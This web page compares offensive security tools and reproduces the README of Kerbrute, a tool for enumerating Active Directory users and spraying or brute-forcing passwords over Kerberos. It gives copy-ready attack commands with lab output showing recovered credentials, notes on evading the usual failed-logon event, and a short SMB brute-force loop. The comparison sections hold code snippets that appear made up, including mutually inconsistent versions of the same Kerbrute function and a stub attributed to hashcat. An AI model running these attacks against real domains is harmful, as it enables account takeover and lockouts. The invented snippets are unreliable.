Top Related Projects
World's fastest and most advanced password recovery utility
A little tool to play with Windows security
Impacket is a collection of Python classes for working with network protocols.
Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
Quick Overview
Kerbrute is a tool designed for Kerberos pre-auth bruteforcing. It's written in Go and aims to be a faster, more feature-rich alternative to other Kerberos enumeration tools. Kerbrute can perform user enumeration, password spraying, and brute-force attacks against Active Directory environments.
Pros
- Fast and efficient due to being written in Go
- Supports various attack modes (user enumeration, password spraying, brute-force)
- Can be used with or without domain access
- Cross-platform compatibility (Windows, Linux, macOS)
Cons
- Requires some knowledge of Kerberos and Active Directory
- May trigger security alerts in monitored environments
- Limited to Kerberos-based attacks
- Potential for misuse if not used responsibly
Getting Started
- Download the latest release from the GitHub repository.
- Extract the binary for your operating system.
- Run Kerbrute with the desired mode and options:
# User enumeration
./kerbrute userenum -d DOMAIN.COM userlist.txt
# Password spraying
./kerbrute passwordspray -d DOMAIN.COM domain_users.txt password123
# Brute-force
./kerbrute bruteuser -d DOMAIN.COM passwords.txt username
Replace DOMAIN.COM with the target domain, and provide appropriate user lists or password files as needed.
Note: Always ensure you have proper authorization before using this tool against any network or system.
Competitor Comparisons
World's fastest and most advanced password recovery utility
Pros of hashcat
- Supports a wide range of hash types and attack modes
- Highly optimized for GPU acceleration, offering faster cracking speeds
- Extensive community support and regular updates
Cons of hashcat
- Steeper learning curve for beginners
- Requires more system resources, especially for GPU acceleration
- Not specifically designed for Kerberos-based attacks
Code comparison
Kerbrute (Go):
func (k *Kerbrute) bruteUser(username string) {
for _, password := range k.passwords {
result := k.tryLogin(username, password)
if result {
fmt.Printf("[+] VALID LOGIN:\t %s@%s:%s\n", username, k.realm, password)
break
}
}
}
hashcat (C):
static int module_attack_exec (hashcat_ctx_t *hashcat_ctx, hc_device_param_t *device_param)
{
hashconfig_t *hashconfig = hashcat_ctx->hashconfig;
hashes_t *hashes = hashcat_ctx->hashes;
module_ctx_t *module_ctx = hashcat_ctx->module_ctx;
status_ctx_t *status_ctx = hashcat_ctx->status_ctx;
}
Kerbrute is specifically designed for Kerberos brute-forcing, making it more focused and easier to use for this particular task. hashcat, on the other hand, is a versatile password cracking tool that can handle various hash types and attack modes, but requires more setup for Kerberos-specific attacks.
A little tool to play with Windows security
Pros of Mimikatz
- More comprehensive functionality for Windows credential extraction and manipulation
- Supports a wider range of attack techniques, including pass-the-hash and golden ticket attacks
- Actively maintained with frequent updates and new features
Cons of Mimikatz
- Larger and more complex codebase, potentially harder to understand and modify
- Often flagged by antivirus software due to its widespread use in malicious activities
- Requires administrative privileges to run effectively on target systems
Code Comparison
Mimikatz (C):
BOOL kuhl_m_sekurlsa_pth(int argc, wchar_t * argv[])
{
BYTE ntlm[LM_NTLM_HASH_LENGTH];
KUHL_M_SEKURLSA_PTH_DATA data = {&kuhl_m_sekurlsa_enum_logon_callback_pth, NULL, NULL, NULL, FALSE};
// ... (additional code)
}
Kerbrute (Go):
func (k *Kerbrute) bruteUser(username string) {
for _, password := range k.Passwords {
result := k.tryLogin(username, password)
if result == "SUCCESS" {
k.foundValidCred(username, password)
}
}
}
The code snippets demonstrate the different approaches and languages used by each tool. Mimikatz uses C for low-level Windows API interactions, while Kerbrute employs Go for cross-platform compatibility and ease of use.
Impacket is a collection of Python classes for working with network protocols.
Pros of Impacket
- Comprehensive suite of tools for various network protocols
- Supports a wide range of Windows-specific protocols and authentication methods
- Actively maintained with regular updates and contributions
Cons of Impacket
- Larger codebase and more complex to use
- Requires more setup and dependencies
- May have a steeper learning curve for beginners
Code Comparison
Kerbrute (Go):
func (k *Kerbrute) bruteUser(username string) {
for _, password := range k.passwords {
result := k.tryLogin(username, password)
if result {
fmt.Printf("[+] VALID LOGIN:\t %s@%s:%s\n", username, k.realm, password)
break
}
}
}
Impacket (Python):
def brute_force(target, users, passwords):
for user in users:
for password in passwords:
try:
lmhash = ''
nthash = ''
smb_connection = SMBConnection(target, target)
smb_connection.login(user, password, lmhash, nthash)
print(f"[+] Successful login: {user}:{password}")
return
except Exception:
pass
Both repositories focus on network protocol manipulation and authentication testing, but Impacket offers a broader range of tools and protocol support, while Kerbrute is more specialized for Kerberos brute-forcing. Impacket's versatility comes at the cost of complexity, while Kerbrute is simpler and more focused on its specific task.
Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
Pros of Responder
- Broader functionality: Responder is a multifaceted tool for network analysis and exploitation, offering capabilities beyond just password spraying
- Active development: Responder is frequently updated with new features and bug fixes
- Extensive protocol support: Handles various protocols including HTTP, SMB, MSSQL, FTP, and more
Cons of Responder
- More complex setup and usage: Requires more configuration and understanding of network protocols
- Potentially more disruptive: Can interfere with legitimate network traffic due to its active nature
- Higher likelihood of detection: More likely to trigger security alerts due to its broader scope
Code Comparison
Kerbrute (Go):
func (k *Kerbrute) bruteUser(username string) {
for _, password := range k.passwords {
result := k.tryLogin(username, password)
if result {
fmt.Printf("[+] VALID LOGIN:\t %s@%s:%s\n", username, k.realm, password)
}
}
}
Responder (Python):
def ParseSMBHash(data, client):
lenght = struct.unpack('<H', data[43:45])[0]
parsed = NetworkRecvBufferPython2or3(data[45:])[:lenght].decode('utf-16le')
Hash = parsed.split('\n')[0]
SMBHash = Hash.split(':')[1].encode('ascii','ignore')
print("[+] SMB Hash : %s" % SMBHash)
Convert 
designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual CopilotREADME
Kerbrute
A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication
Grab the latest binaries from the releases page to get started.
Background
This tool grew out of some bash scripts I wrote a few years ago to perform bruteforcing using the Heimdal Kerberos client from Linux. I wanted something that didn't require privileges to install a Kerberos client, and when I found the amazing pure Go implementation of Kerberos gokrb5, I decided to finally learn Go and write this.
Bruteforcing Windows passwords with Kerberos is much faster than any other approach I know of, and potentially stealthier since pre-authentication failures do not trigger that "traditional" An account failed to log on event 4625. With Kerberos, you can validate a username or test a login by only sending one UDP frame to the KDC (Domain Controller)
For more background and information, check out my Troopers 2019 talk, Fun with LDAP and Kerberos (link TBD)
Usage
Kerbrute has three main commands:
- bruteuser - Bruteforce a single user's password from a wordlist
- bruteforce - Read username:password combos from a file or stdin and test them
- passwordspray - Test a single password against a list of users
- userenum - Enumerate valid domain usernames via Kerberos
A domain (-d) or a domain controller (--dc) must be specified. If a Domain Controller is not given the KDC will be looked up via DNS.
By default, Kerbrute is multithreaded and uses 10 threads. This can be changed with the -t option.
Output is logged to stdout, but a log file can be specified with -o.
By default, failures are not logged, but that can be changed with -v.
Lastly, Kerbrute has a --safe option. When this option is enabled, if an account comes back as locked out, it will abort all threads to stop locking out any other accounts.
The help command can be used for more information
$ ./kerbrute -h
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (bc1d606) - 11/15/20 - Ronnie Flathers @ropnop
This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts
Usage:
kerbrute [command]
Available Commands:
bruteforce Bruteforce username:password combos, from a file or stdin
bruteuser Bruteforce a single user's password from a wordlist
help Help about any command
passwordspray Test a single password against a list of users
userenum Enumerate valid domain usernames via Kerberos
version Display version info and quit
Flags:
--dc string The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
--delay int Delay in millisecond between each attempt. Will always use single thread if set
-d, --domain string The full domain to use (e.g. contoso.com)
--downgrade Force downgraded encryption type (arcfour-hmac-md5)
--hash-file string File to save AS-REP hashes to (if any captured), otherwise just logged
-h, --help help for kerbrute
-o, --output string File to write logs to. Optional.
--safe Safe mode. Will abort if any user comes back as locked out. Default: FALSE
-t, --threads int Threads to use (default 10)
-v, --verbose Log failures and errors
Use "kerbrute [command] --help" for more information about a command.
User Enumeration
To enumerate usernames, Kerbrute sends TGT requests with no pre-authentication. If the KDC responds with a PRINCIPAL UNKNOWN error, the username does not exist. However, if the KDC prompts for pre-authentication, we know the username exists and we move on. This does not cause any login failures so it will not lock out any accounts. This generates a Windows event ID 4768 if Kerberos logging is enabled.
root@kali:~# ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop
2019/03/06 21:28:04 > Using KDC(s):
2019/03/06 21:28:04 > pdc01.lab.ropnop.com:88
2019/03/06 21:28:04 > [+] VALID USERNAME: amata@lab.ropnop.com
2019/03/06 21:28:04 > [+] VALID USERNAME: thoffman@lab.ropnop.com
2019/03/06 21:28:04 > Done! Tested 1001 usernames (2 valid) in 0.425 seconds
Password Spray
With passwordspray, Kerbrute will perform a horizontal brute force attack against a list of domain users. This is useful for testing one or two common passwords when you have a large list of users. WARNING: this does will increment the failed login count and lock out accounts. This will generate both event IDs 4768 - A Kerberos authentication ticket (TGT) was requested and 4771 - Kerberos pre-authentication failed
root@kali:~# ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop
2019/03/06 21:37:29 > Using KDC(s):
2019/03/06 21:37:29 > pdc01.lab.ropnop.com:88
2019/03/06 21:37:35 > [+] VALID LOGIN: callen@lab.ropnop.com:Password123
2019/03/06 21:37:37 > [+] VALID LOGIN: eshort@lab.ropnop.com:Password123
2019/03/06 21:37:37 > Done! Tested 2755 logins (2 successes) in 7.674 seconds
Brute User
This is a traditional bruteforce account against a username. Only run this if you are sure there is no lockout policy! This will generate both event IDs 4768 - A Kerberos authentication ticket (TGT) was requested and 4771 - Kerberos pre-authentication failed
root@kali:~# ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop
2019/03/06 21:38:24 > Using KDC(s):
2019/03/06 21:38:24 > pdc01.lab.ropnop.com:88
2019/03/06 21:38:27 > [+] VALID LOGIN: thoffman@lab.ropnop.com:Summer2017
2019/03/06 21:38:27 > Done! Tested 1001 logins (1 successes) in 2.711 seconds
Brute Force
This mode simply reads username and password combinations (in the format username:password) from a file or from stdin and tests them with Kerberos PreAuthentication. It will skip any blank lines or lines with blank usernames/passwords. This will generate both event IDs 4768 - A Kerberos authentication ticket (TGT) was requested and 4771 - Kerberos pre-authentication failed
$ cat combos.lst | ./kerbrute -d lab.ropnop.com bruteforce -
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 05/11/19 - Ronnie Flathers @ropnop
2019/05/11 18:40:56 > Using KDC(s):
2019/05/11 18:40:56 > pdc01.lab.ropnop.com:88
2019/05/11 18:40:56 > [+] VALID LOGIN: athomas@lab.ropnop.com:Password1234
2019/05/11 18:40:56 > Done! Tested 7 logins (1 successes) in 0.114 seconds
Installing
You can download pre-compiled binaries for Linux, Windows and Mac from the releases page. If you want to live on the edge, you can also install with Go:
$ go get github.com/ropnop/kerbrute
With the repository cloned, you can also use the Make file to compile for common architectures:
$ make help
help: Show this help.
windows: Make Windows x86 and x64 Binaries
linux: Make Linux x86 and x64 Binaries
mac: Make Darwin (Mac) x86 and x64 Binaries
clean: Delete any binaries
all: Make Windows, Linux and Mac x86/x64 Binaries
$ make all
Done.
Building for windows amd64..
Building for windows 386..
Done.
Building for linux amd64...
Building for linux 386...
Done.
Building for mac amd64...
Building for mac 386...
Done.
$ ls dist/
kerbrute_darwin_386 kerbrute_linux_386 kerbrute_windows_386.exe
kerbrute_darwin_amd64 kerbrute_linux_amd64 kerbrute_windows_amd64.exe
Credits
Huge shoutout to jcmturner for his pure Go implementation of KRB5: https://github.com/jcmturner/gokrb5 . An amazing project and very well documented. Couldn't have done any of this without that project.
Shoutout to audibleblink for the suggestion and implementation of the delay option!
Top Related Projects
World's fastest and most advanced password recovery utility
A little tool to play with Windows security
Impacket is a collection of Python classes for working with network protocols.
Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
Convert designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual Copilot